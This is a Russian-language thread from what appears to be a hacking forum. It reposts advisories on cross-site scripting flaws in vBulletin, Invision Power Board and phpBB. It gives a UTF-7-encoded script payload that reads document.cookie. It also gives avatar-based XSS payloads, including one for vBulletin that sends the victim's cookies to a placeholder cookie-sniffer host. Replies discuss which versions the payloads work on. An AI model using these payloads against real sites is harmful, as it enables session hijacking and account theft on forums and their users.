• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимость в форумах

Great

CPU register
Пользователь
Регистрация
13.11.2005
Сообщения
1 622
Реакции
6
XSS в обработке сообщений в кодировке UTF-7 во многих форумах
Программа: vBulletin, Invision Power Board, phpBB, и проч.
Описание:
Многие форумы не обрабатывают теги HTML в кодировке UTF-7, из-за чего возможна XSS-атака. Нужно всего лишь заставить браузер отобразить документ в кодировке UTF-7 и xss сработает. Это можно сделать с помощью явного указания кодировки тегом <meta>.
Эксплоит/Пример:
Код:
+ ADw-/title+ AD4-+ ADw-script+ AD4-alert(document.cookie)+ ADs-+ ADw-/script+ AD4-
(удалите все пробелы после знаков +, я вставил из-за того, что иначе форум сделает автозамену, - Прим. Great)

Источник: SecurityLab

Примечание. В прошедшие 5 дней велись активные работы по устранению данной уязвимости на нашем портале. Выражаю огромную благодарность FreeAtNet'у, немало способствовавшмеу закрытию уязвимости. Но все же, если вы найдете где-нибудь на портале эту уязвимость, просьба немедленно сообщить администрации.
 
Обход ограничений аватар в форумных движках
Программа:
phpBB 2.0.x
IPB 1.x
vBulletin примерно 3.x(тестировалось на версии 3.5.4)
phpBB 2.0.19 уязвимости не подвержена.
Уязвимость работает только с браузером MSIE.
Описание:
Форумы не проверяют содержимое отправляемых пользователем аватар. Злонамеренный пользователь может сформировать специальный файл аватары, содержащий код, который будет выполнен в браузере жертвы при прямом переходе к изображению.
Пример:
phpBB, IPB

Код:
<sсript>[XSS]</sсript>

vBulletin

Код:
<pre a=”>” onmouseover=”document.location=”http://[cookie_sniffer]/exploit.php?c=”+document.cookie” b=”</pre”>

Источник: secbun.info
 
у меня лично на phpBB 2.16 не вышло
Тестировалось на phpBB 2.0.14. Все работает отлчино.
durito, читайте внимательно:
код, который будет выполнен в браузере жертвы при прямом переходе к изображению.
Я не зря это писал. Чтобы код выполнился, необходимо в адресной строке браузера вписать полный УРЛ изображения. При обычном просмотре через профиль не работает.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх